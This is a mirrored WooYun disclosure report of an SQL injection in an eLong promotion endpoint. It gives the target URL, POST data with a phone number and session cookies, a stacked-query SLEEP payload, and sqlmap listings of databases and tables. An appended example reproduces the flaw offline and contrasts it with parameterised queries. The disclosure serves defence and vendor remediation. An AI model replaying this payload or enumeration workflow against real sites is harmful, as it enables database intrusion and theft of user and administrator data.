SQL injection on an eLong (艺龙) site: two databases, 170 tables, including user tables and administrator passwords

Posted by admin, 2017-05-07 11:29:45
Summary

2016-03-14: Details reported to the vendor, awaiting vendor handling
2016-03-16: Vendor confirmed; details disclosed to the vendor only
2016-03-26: Details disclosed to core white hats and relevant domain experts
2016-04-05: Details disclosed to regular white hats
2016-04-15: Details disclosed to intern white hats
2016-04-30: Details disclosed to the public

Vulnerability summary

Defect ID: WooYun-2016-184247

Title: SQL injection on an eLong (艺龙) site: two databases, 170 tables, including user tables and administrator passwords

Vendor: 艺龙旅行网 (eLong Travel)

Author: hear7v

Submitted: 2016-03-14 09:54

Published: 2016-04-30 13:52

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: www.wooyun.org

Tags: sql injection

Vulnerability details


Brief description:

It has been a while since I last submitted a bug to WooYun. A certain eLong site has SQL injection: two databases, 170 tables, with a large amount of user information, administrator passwords and other data exposed. How about a spot on the front page?

Detailed description:

{
  "target": "http://mhuodong.elong.com/PromotionJson/GetSmsCode",
  "agent": "Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI ALE-CL00 Build/HuaweiALE-CL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 ewandroid/9.9.1",
  "referer": null,
  "report": "",
  "cookie": "H5SessionId=3dbcc29e-c256-4234-8570-eda034ce26cc; H5Channel=ewhtml5%2cDefault; H5CookieId_s=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; H5CookieId=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; route=b0c9360f937aba159859a160623bc8de; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; NSC_NCBQQEXOME_80=ffffffffaf1d13b445525d5f4f58455e445a4a4229a0",
  "data": "activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&mobile=18980144019&gCode="
}

Proof of vulnerability:

sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: activityId (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=
---
back-end DBMS: MySQL 5.0.11

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: activityId (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=
---
back-end DBMS: MySQL 5.0.11

available databases [3]:
[*] information_schema
[*] test
[*] weixinpacket

Database: test
[163 tables]
+-----------------------------+
| BDDJoueurs |
| Booked_On |
| Campus |
| CodeRuleType |
| DEPARTAMENTO |
| DWE_Predecessors |
| D_Abbreviation |
| D_EM_DESTINATARIO |
| D_Format_Data |
| Descriptions_Languages |
| EMPLEADO |
| Equipment |
| LT_CUSTOM1 |
| LT_CUSTOM2 |
| LT_CUSTOM3 |
| LT_CUSTOM4 |
| LT_GRUPO |
| MM_USUARIOS_DO_PROCESSO |
| Model |
| POINT |
| Parametre |
| PostalAddress |
| Propdesc_table |
| Property |
| RATING |
| ROLE_PERM |
| SYNALLAGI |
| S_SESSOES |
| StateType |
| Station_Data |
| THOT_YEAR |
| UM_ROLE_ATTRIBUTES |
| Users |
| null |
| size |
| access_control |
| account_multi |
| account_transaction |
| accountuser |
| acctmanager |
| actualites |
| admin_psw |
| artikel_variationsgruppen |
| basePlusCommissionEmployees |
| binn_articles |
| binn_bann_temps |
| binn_catlinks |
| binn_cform_settings |
| binn_docs_temps |
| binn_faq_temps |
| binn_forum_threads |
| binn_news |
| binn_rubrikator_tlevel |
| binn_system_messages |
| binn_vote_results |
| cdb_announcements |
| cdb_attachments |
| cdb_banned |
| cdb_debates |
| cdv_curated_allele |
| cocktail_person |
| combustiblebois |
| connections |
| contador_empresa |
| convite |
| copytest |
| curso |
| dados_familia |
| dados_prefeitura |
| decodifica_tabelle |
| despesa_familia |
| div_treatment |
| dtb_bat_order_daily_age |
| dtb_send_customer |
| economy |
| email |
| emailinfo |
| enrolls |
| ew_gruppi |
| ezsearch_return_count_new |
| ezsearch_search_phrase_new |
| f_spatialcontext |
| files |
| forum_user_stat |
| gd |
| geo_lake |
| gl |
| greylist |
| hardware |
| house_extensions |
| ibf_members |
| images |
| instituicao |
| ippaths |
| jforum_posts |
| jforum_ranks |
| jiveID |
| jos_polls |
| jos_respuestas |
| jos_vm_orders |
| kauf_artikel |
| kontakt |
| logradouro |
| m_data |
| mehrwertsteuer |
| mein_doc |
| mtb_zip |
| mymps_certification |
| mymps_member_tpl |
| mymps_upload |
| nuke_journal |
| nuke_links_categories |
| nuke_message |
| nuke_related |
| nuke_topics |
| nuke_users_temp |
| officer |
| osc_products |
| partsgroup |
| perfil |
| photo |
| phpbb_confirm |
| phpbb_search_results |
| phpbb_themes_name |
| pictures |
| post |
| pricegroup |
| problem |
| queue_info |
| redirect |
| reserve |
| riddles |
| routerbenchmarks |
| serie |
| site_environment |
| site_location |
| soc_da_polit_ge |
| software |
| spip_articles |
| spip_mots_documents |
| studierende |
| sysmaps |
| sysmergeschemaarticles |
| tb_username |
| tbadmins |
| tblStones |
| tblmanagers |
| templatelinks |
| tf_rss |
| tmp |
| topic |
| trackbacks |
| trivia |
| ts2_server_privileges |
| tt_address |
| tx_tcdirectmail_targets |
| user_preferences |
| user_rights |
| valhalla |
| verkaeufer |
| webcal_group_user |
| zl_baoming |
| zl_finance |
+-----------------------------+

Database: weixinpacket
[9 tables]
+---------------------+
| dictionary |
| ew_moduli |
| imageAttribute |
| iplinks |
| maxcodevento |
| phpbb_themes |
| rating_track |
| reciprocal_admin |
| vrls_listing_images |
+---------------------+

back-end DBMS: MySQL 5.0.11

Database: test
Table: users
[14 columns]
+----------------------------+---------+
| Column                     | Type    |
+----------------------------+---------+
| caroline-du-nord           | numeric |
| adminpass                  | numeric |
| fldfuntype                 | numeric |
| id_refferer                | numeric |
| idricoverohatipologia      | numeric |
| mod_virtuemart_featureprod | numeric |
| shared_secret              | numeric |
| sub                        | numeric |
| sub_comment1               | numeric |
| sub_comment5               | numeric |
| tutor                      | numeric |
| uname                      | numeric |
| version_min                | numeric |
| zid                        | numeric |
+----------------------------+---------+

Remediation:

Filter the input.
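The report proves the bug purely by timing (a stacked SLEEP(5) statement appended to activityId) and proposes "filtering" as the fix. The following is an added example, not code from the report or from eLong: it reproduces the stacked-query injection offline against an in-memory SQLite database, shows the same time-based confirmation a tester should do (median of several samples against a benign control, not one slow response), and puts the real fix, a parameterised query, beside the vulnerable concatenation. Assumptions: MySQL's SLEEP() is emulated by a registered Python function; the report's payload is rewritten in SQLite dialect (outer parentheses dropped, `-- ` instead of MySQL's `#` comment); the `activities` table, its row and the `lookup_*` handlers are constructed for the demo and are not the application's schema or code.

```python
"""Stacked-query / time-based SQL injection, reproduced offline.

Added example, not code from the original report or from eLong.  It stands
in for the GetSmsCode lookup behind the activityId parameter with an
in-memory SQLite database: MySQL's SLEEP() is emulated by a registered
Python function, and the report's MySQL payload is rewritten in SQLite
dialect (no outer parentheses, '-- ' instead of the '#' comment).  The
schema, table name and row are constructed for the demo.
"""
import sqlite3
import statistics
import time

# The activityId from the report's request, and the adapted payload: the
# quote closes the string literal, ';' starts a second statement, and the
# trailing comment swallows the application's own closing quote.
REAL_ID = "65698945-4ed7-4e70-9078-fae5a80c78fe"
PAYLOAD = REAL_ID + "';SELECT * FROM (SELECT(SLEEP(5)))gbhk-- "

SCHEMA = """
CREATE TABLE activities (activityId TEXT PRIMARY KEY, name TEXT);
INSERT INTO activities VALUES ('65698945-4ed7-4e70-9078-fae5a80c78fe', 'demo promotion');
"""


class Backend:
    """Constructed stand-in for the application's data layer."""

    def __init__(self, sleep_scale=0.04):
        # SLEEP(5) would cost five real seconds; scale it to 0.2 s per call.
        self.sleep_scale = sleep_scale
        self.sleep_calls = []
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript(SCHEMA)
        self.conn.create_function("SLEEP", 1, self._sleep)

    def _sleep(self, seconds):
        # Emulates MySQL SLEEP(n): log the call, block, return 0.
        self.sleep_calls.append(seconds)
        time.sleep(seconds * self.sleep_scale)
        return 0

    def lookup_vulnerable(self, activity_id):
        # String concatenation, run through an API that executes every
        # statement in the string (the equivalent of a MySQL connection
        # opened with multi-statement support).  The attacker's second
        # statement runs; the observable is the delay, as in the report.
        sql = "SELECT name FROM activities WHERE activityId='%s'" % activity_id
        self.conn.executescript(sql)

    def lookup_safe(self, activity_id):
        # Parameterised query: the whole input is bound as one string value,
        # so the quote and ';' never reach the SQL parser as syntax.
        row = self.conn.execute(
            "SELECT name FROM activities WHERE activityId=?", (activity_id,)
        ).fetchone()
        return row[0] if row else None


def timed(handler, activity_id):
    """Wall-clock seconds for one request to the handler."""
    start = time.perf_counter()
    handler(activity_id)
    return time.perf_counter() - start


def time_based_check(backend, handler, samples=3):
    """Confirm a time-based injection the way a careful tester does:
    compare the median latency of a benign control against the SLEEP
    payload over several samples, and only call it injectable when the
    delta is a sizeable fraction of the requested delay (here half of the
    scaled SLEEP(5)).  A single slow response proves nothing."""
    threshold = 5 * backend.sleep_scale / 2
    base = statistics.median(timed(handler, REAL_ID) for _ in range(samples))
    slow = statistics.median(timed(handler, PAYLOAD) for _ in range(samples))
    return slow - base >= threshold, slow - base


def demo():
    """Run both handlers through the check and report what happened."""
    be = Backend()
    vulnerable, vdelta = time_based_check(be, be.lookup_vulnerable)
    vuln_sleeps = len(be.sleep_calls)
    be.sleep_calls.clear()
    safe_flagged, sdelta = time_based_check(be, be.lookup_safe)
    return {
        "vulnerable_flagged": vulnerable,
        "vulnerable_delta": round(vdelta, 3),
        "vulnerable_sleep_calls": vuln_sleeps,
        "safe_flagged": safe_flagged,
        "safe_delta": round(sdelta, 3),
        "safe_sleep_calls": len(be.sleep_calls),
        "safe_result_for_payload": be.lookup_safe(PAYLOAD),
        "safe_result_for_real_id": be.lookup_safe(REAL_ID),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it and the vulnerable handler is flagged with one SLEEP call per payload request, while the parameterised handler is never flagged, never calls SLEEP, and simply returns no row for the payload because the entire string is compared as a literal. That is why a blacklist filter on quotes or keywords is the wrong fix: the driver-level parameter binding removes the parser from the attacker's reach regardless of what the input contains.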

Copyright notice: please credit hear7v@WooYun when reposting.


Vendor response

Severity: High

Rank: 13

Confirmed: 2016-03-16 13:52

Vendor reply:

Verified, thanks to the white hat!

Latest status:

None

Mirrored by admin at CN-SEC: http://cn-sec.com/archives/44433.html (please keep this link when reposting; thanks to the original author)
